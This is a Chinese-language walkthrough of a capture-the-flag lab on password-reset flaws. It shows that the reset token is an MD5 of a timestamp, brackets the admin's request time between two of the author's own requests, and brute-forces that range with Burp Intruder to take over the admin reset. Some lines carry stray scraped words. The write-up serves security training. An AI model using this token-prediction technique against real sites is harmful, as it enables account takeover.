任意用户密码重置漏洞

http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/php

点击忘记密码,观察返回信息html

admin用户web

admin123用户3d

 

咱们分析重置密码的连接请求:htm

http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=64b157a411e59077fcea643739723797&username=admin123blog

http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=155c528733ea476b64f7dcda45b95ae4&username=admin456md5

http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=8cffd052bb1b485b714f5a4654cc64e4&username=admin789get

 

sukey=64b157a411e59077fcea643739723797请求

惟有这个参数不一致,看样子是MD5,进行解密试试:密码

https://www.somd5.com/

 

看起来是时间戳,咱们进行转换下格式看看

 

 那么这里admin的重置链接具体为多少呢?咱们这样猜想,先找回admin123的密码,而后找回admin的密码,再找回admin123的密码,之间的时间戳就是admin的,那么尝试进行爆破便可。

http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=a2c58e13046e75028b102d744dec8f74&username=admin123

admin

http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=98cee838562bb14b378ab1b0d37836a2&username=admin123

a2c58e13046e75028b102d744dec8f74---1566811472

98cee838562bb14b378ab1b0d37836a2---1566811494

admin的重置sukey 就介于:1566811472  到 1566811494 之间

咱们尝试爆破下看看:

请求:http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=98cee838562bb14b378ab1b0d37836a2&username=admin

burp进行截断发送到intruder模块:

 

能够看待顺利枚举出密码重置链接,获取key

参考大神:https://www.freebuf.com/articles/web/176211.html

相关文章
相关标签/搜索